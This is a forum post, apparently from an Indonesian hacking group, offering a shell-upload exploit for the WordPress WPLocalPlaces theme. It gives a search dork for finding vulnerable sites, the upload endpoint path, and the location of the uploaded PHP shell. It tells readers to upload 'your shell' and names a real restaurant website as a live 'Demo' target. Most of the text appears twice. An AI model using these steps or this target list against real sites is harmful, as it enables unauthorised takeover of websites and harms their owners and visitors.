Post: #1WordPress WPLocalPlaces Themes Shell Upload Vulnerabillity
#Title : WordPress WPLocalPlaces Themes Shell Upload Vulnerabillity
#Content Creator : TsuNaomi48
#Date : 11/29/2013
#Category : Web Applications
#Type : PHP
#Greetz : Pscript | Bebyyers404 | Panda Dot ID | Nabilaholic404
Garuda Dot ID | Cyber_Taregh | JKT48 CYBER TEAM | PhantomGhost | Indonesian Cyber Army
#Title : WordPress WPLocalPlaces Themes Shell Upload Vulnerabillity
#Content Creator : TsuNaomi48
#Date : 11/29/2013
#Category : Web Applications
#Type : PHP
#Greetz : Pscript | Bebyyers404 | Panda Dot ID | Nabilaholic404
Garuda Dot ID | Cyber_Taregh | JKT48 CYBER TEAM | PhantomGhost | Indonesian Cyber Army
#Vulnerabillity : Shell Upload
#Dork : inurl:/wp-content/themes/WPLocalPlaces/
Exploit & POC
http://site-target/wp-content/themes/WPLocalPlaces/monetize/upload/
Result Upload
http://site-target/wp-content/uploads/[years]/[months]/[Find_your_shell].php
Demo :
http://www.guntersvillerestaurants.com/w...ze/upload/
Click Browse, And Choose your shell..
(This post was last modified: 11-19-2013 11:46 PM by TsuNaomi48.)
#Vulnerabillity : Shell Upload
#Dork : inurl:/wp-content/themes/WPLocalPlaces/
Exploit & POC
http://site-target/wp-content/themes/WPLocalPlaces/monetize/upload/
Result Upload
http://site-target/wp-content/uploads/[years]/[months]/[Find_your_shell].php
Demo :
http://www.guntersvillerestaurants.com/w...ze/upload/
Click Browse, And Choose your shell..
(This post was last modified: 11-19-2013 11:46 PM by TsuNaomi48.)
0 Komentar